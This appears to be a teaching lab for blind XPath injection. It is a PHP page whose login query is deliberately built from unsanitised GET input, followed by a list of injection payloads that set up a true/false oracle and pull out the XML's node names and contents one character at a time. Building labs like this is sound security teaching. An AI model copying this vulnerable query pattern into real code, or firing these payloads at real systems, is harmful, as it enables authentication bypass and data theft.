<?php
$name = $_GET['name'] ?? '';
$pass = $_GET['pass'] ?? '';

$xml = '<root>
		<user><name>x</name><password>foo</password></user>
		<!-- secret comment -->
		<user><name>y</name><password>lalala</password></user>
		</root>';
$doc = new DOMDocument();
$doc->loadXML($xml);
$xpath = new DOMXPath($doc);
$query = "/user[name='$name' and password='$pass']";
/** @noinspection PhpUsageOfSilenceOperatorInspection */
$result = @$xpath->query($query);
/** @noinspection ForgottenDebugOutputInspection */
var_dump(array("query" => $query, "result" => $result));
?>
<ol>
	<li>
		<a href="?name=&pass=">
			This is the URL used to query the XML file (for login purpose)
		</a>
	</li>
	<li>
		<a href="?name=&pass='">
			First, test Xpath injectability (result becomes "false", meaning "error")
		</a>
	</li>
	<li>
		<a href="?name=&pass=%27%20and%201=0]|/*[1=1][%271%27=%271">
			Now, make it an oracle for a true request (1=1; result length = 1)<br/>
			<code lang="zxx-pseudo">%27%20and%201=0]</code> ends the actual website's query (prefix),<br/>
			<code lang="zxx-pseudo">|/*[1=1]</code> is your oracle<br/>
			and <code lang="zxx-pseudo">[%271%27=%271</code> makes the query valid (because of '] suffix)
		</a>
	</li>
	<li>
		<a href="?name=&pass=%27%20and%201=0]|/*[1=0][%271%27=%271">
			And test your oracle for a false (1=0) query (result length = 0)
		</a>
	</li>
	<li>
		<a href="?name=&pass=%27%20and%201=0]|/*[string-length(local-name(/*))=1][%271%27=%271">
			You can now use this oracle to test the length of the root node's name
		</a>
	</li>
	<li>
		<a href="?name=&pass=%27%20and%201=0]|/*[string-length(local-name(/*))=4][%271%27=%271">
			Until you find it
		</a>
	</li>
	<li>
		<a href="?name=&pass=%27%20and%201=0]|/*[substring(local-name(/*), 1, 1)='a'][%271%27=%271">
			Then use the oracle to find 1st letter
		</a>
	</li>
	<li>
		<a href="?name=&pass=%27%20and%201=0]|/*[substring(local-name(/*), 1, 1)='r'][%271%27=%271">
			Iterate on every possible letter/digit/char until finding the correct one
		</a>
	</li>
	<li>
		<a href="?name=&pass=%27%20and%201=0]|/*[substring(local-name(/*), 2, 1)='a'][%271%27=%271">
			And then try next letter
		</a>
	</li>
	<li>
		<a href="?name=&pass=%27%20and%201=0]|/*[substring(local-name(/*), 2, 1)='o'][%271%27=%271">
			Until you find it ("o")
		</a>
	</li>
	<li>
		<a href="?name=&pass=%27%20and%201=0]|/*[substring(local-name(/*), 4, 1)='t'][%271%27=%271">
			And again, until you find the 1st node is <code lang="zxx-xml">&lt;root&gt;</code>
		</a>
	</li>
	<li>
		<a href="?name=&pass=%27%20and%201=0]|/*[local-name(/root/node()[1])=''][%271%27=%271">
			Now, test what the 1st child node of "root" is: is it text?
		</a>
	</li>
	<li>
		<a href="?name=&pass=%27%20and%201=0]|/*[string-length(/root/text()[1])=3][%271%27=%271">
			If so, find its exact length (3 chars here)
		</a>
	</li>
	<li>
		<a href="?name=&pass=%27%20and%201=0]|/*[substring(/root/text()[1], 1, 1)='a'][%271%27=%271">
			And iterate again to find its content
		</a>
	</li>
	<li>
		<a href="?name=&pass=%27%20and%201=0]|/*[substring(/root/text()[1], 1, 1)='%0A'][%271%27=%271">
			Don't forget to test for CR, LF and TAB chars
		</a>
	</li>
	<li>
		<a href="?name=&pass=%27%20and%201=0]|/*[local-name(/root/node()[2])=''][%271%27=%271">
			And if node is not a text node, but a regular node,...
		</a>
	</li>
	<li>
		<a href="?name=&pass=%27%20and%201=0]|/*[string-length(local-name(/root/node()[2]))=4][%271%27=%271">
			...then proceed like for root node
		</a>
	</li>
</ol>
<p>
	This will give you the basic techniques for oracle-requesting all the content of the XML
</p>

